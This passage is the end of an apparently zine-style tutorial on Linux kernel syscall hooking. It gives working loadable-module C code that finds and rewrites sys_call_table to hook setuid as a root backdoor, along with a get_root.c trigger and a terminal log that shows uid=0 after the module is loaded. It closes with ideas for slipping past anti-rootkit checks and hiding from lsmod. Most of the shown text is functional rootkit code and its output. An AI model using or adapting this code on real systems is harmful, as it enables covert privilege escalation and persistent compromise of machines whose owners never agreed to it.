memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));
#ifdef __i386__
system_call = (void*)((idtd.offset_high<<16) | idtd.offset_low);
#elif defined(__x86_64__)
system_call = (void*)(((long)idtd.offset_high<<32) |
(idtd.offset_middle<<16) | idtd.offset_low);
#endif
for (ptr=system_call, i=0; i<500; i++) {
#ifdef __i386__
if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
return *((void**)(ptr+3));
#elif defined(__x86_64__)
if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
return (void*) (0xffffffff00000000 | *((unsigned int*)(ptr+3)));
#endif
ptr++;
}
return NULL;
}
#endif
#ifdef __x86_64__
#define IA32_LSTAR 0xc0000082
void *get_sys_call_table(void) {
void *system_call;
unsigned char *ptr;
int i, low, high;
asm volatile("rdmsr" : "=a" (low), "=d" (high) : "c" (IA32_LSTAR));
system_call = (void*)(((long)high<<32) | low);
for (ptr=system_call, i=0; i<500; i++) {
if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
return (void*)(0xffffffff00000000 | *((unsigned int*)(ptr+3)));
ptr++;
}
return NULL;
}
#endif
void *get_writable_sct(void *sct_addr) {
struct page *p[2];
void *sct;
unsigned long addr = (unsigned long)sct_addr & PAGE_MASK;
if (sct_addr == NULL)
return NULL;
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__)
p[0] = pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);
p[1] = pfn_to_page(__pa_symbol(addr + PAGE_SIZE) >> PAGE_SHIFT);
#else
p[0] = virt_to_page(addr);
p[1] = virt_to_page(addr + PAGE_SIZE);
#endif
sct = vmap(p, 2, VM_MAP, PAGE_KERNEL);
if (sct == NULL)
return NULL;
return sct + offset_in_page(sct_addr);
}
static int __init hook_init(void) {
sys_call_table = get_writable_sct(get_sys_call_table());
if (sys_call_table == NULL)
return -1;
#ifdef CONFIG_IA32_EMULATION
ia32_sys_call_table = get_writable_sct(get_ia32_sys_call_table());
if (ia32_sys_call_table == NULL) {
vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
return -1;
}
#endif
/* hook setuid */
#ifdef __NR_setuid32
real_setuid = sys_call_table[__NR_setuid32];
sys_call_table[__NR_setuid32] = hooked_setuid;
#else
real_setuid = sys_call_table[__NR_setuid];
sys_call_table[__NR_setuid] = hooked_setuid;
#endif
#ifdef CONFIG_IA32_EMULATION
#ifdef __NR32_setuid32
ia32_sys_call_table[__NR32_setuid32] = hooked_setuid;
#else
ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
#endif
#endif
/***************/
return 0;
}
static void __exit hook_exit(void) {
/* unhook setuid */
#ifdef __NR_setuid32
sys_call_table[__NR_setuid32] = real_setuid;
#else
sys_call_table[__NR_setuid] = real_setuid;
#endif
#ifdef CONFIG_IA32_EMULATION
#ifdef __NR32_setuid32
ia32_sys_call_table[__NR32_setuid32] = real_setuid;
#else
ia32_sys_call_table[__NR32_setuid] = real_setuid;
#endif
#endif
/*****************/
// unmap memory
vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
#ifdef CONFIG_IA32_EMULATION
vunmap((void*)((unsigned long)ia32_sys_call_table & PAGE_MASK));
#endif
}
module_init(hook_init);
module_exit(hook_exit);
MODULE_LICENSE("GPL");
--EOF--
--file: get_root.c--
#include <unistd.h>
int main() {
if (setuid(31337) == -1) {
perror("setuid");
return 1;
}
execlp("bash", "bash", NULL);
}
--EOF--
oblique@gentoo ~/hooking $ ./configure.sh
oblique@gentoo ~/hooking $ make
make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hooking modules
make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
CC [M] /home/oblique/hooking/hook_setuid.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/oblique/hooking/hook_setuid.mod.o
LD [M] /home/oblique/hooking/hook_setuid.ko
make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
oblique@gentoo ~/hooking $ sudo insmod hook_setuid.ko
oblique@gentoo ~/hooking $ gcc get_root.c -o get_root
oblique@gentoo ~/hooking $ ./get_root
gentoo hooking # id
uid=0(root) gid=0(root) groups=0(root)
gentoo hooking # rmmod hook_setuid
gentoo hooking # exit
exit
oblique@gentoo ~/hooking $ ./get_root
setuid: Operation not permitted
oblique@gentoo ~/hooking $
--[ 0x0B Other ideas/methods
What we saw, was one of the most basic hooking techniques. There are
lots of equivalent techniques: for example, to avoid editing the
sys_call_table, we can just allocate a buffer in kernel memory and copy
the sys_call_table there. Then we change the addresses in the new array
and finally we change the address called by the system_call. If we
want, we can change the intrerrupt's 0x80 value from IDT, or the value
of IA32_LSTAR MSR, pointing to another system_call. One other elegant
hooking method, independent from system calls, is hooking the
debugger's trap. This can be implemented using the interrupt 3 from
IDT.
This technique has some limitations. It cannot be applied in systems
which have the LKM support disabled. Modules *must* be compiled for the
same kernel they are going to be loaded from, which means that with a
kernel update, module needs to be re-compiled. Solutions for these
issues are provided by some userland-based techniques which can change
the kernel memory through /dev/mem or /dev/kmem, but in this case other
forms of protection need to be faced.
Notice: Anti-rootkits usually check the sys_call_table, so the method
shown here should not be used. Maybe some workaround is to change
sys_call_table's address inside system_call, or implement our own
system_call. Moreover with lsmod or through /proc/kallsyms, a sys-admin
should be able to notice that something goes wrong...but hooking can
solve all these issues.
I hope you enjoyed reading the article as much as I enjoyed writing it :)
Happy hacking,
oblique.
--[ 0x0C Greets
Greets to grhack.net community, AthCon staff and p0wnbox.Team. Special
thanks to slasher, huku, sin, Hack_ThE_PaRaDiSe, krumel, smack for
their knowledge and their company. Thanks pytt, angel_scar and
killer_null for being good friends. Last but not least I want to give
kudos to my friends from the real world, psychedelic music and FF.C for
their songs and philosophy.
--[ 0x0D References
[1] http://phrack.org/issues.html?issue=59&id=4#article
[2] http://phrack.org/issues.html?issue=58&id=7#article
[3] http://wiki.osdev.org/IDT#IDT_in_IA-32e_Mode_.2864-bit_IDT.29
[5] Linux Kernel source code ( http://kernel.org )
[6] KSplice source code ( http://www.ksplice.com/software )
Intel 64 and IA-32 Architectures Software Developer's Manual
( http://www.intel.com/products/processor/manuals/ ):
[7] "Volume 3A: System Programming Guide", Sections: 5.8.7 - 5.9, 9.4
[8] "Volume 3B: System Programming Guide", Appendix B
[9] "Volume 2B: Instruction Set Reference, N-Z", Section: 4.2,
Instructions: RDMSR, WRMSR, SYSCALL
# vim:tw=75:sts=4:sw=4:et
You can’t perform that action at this time.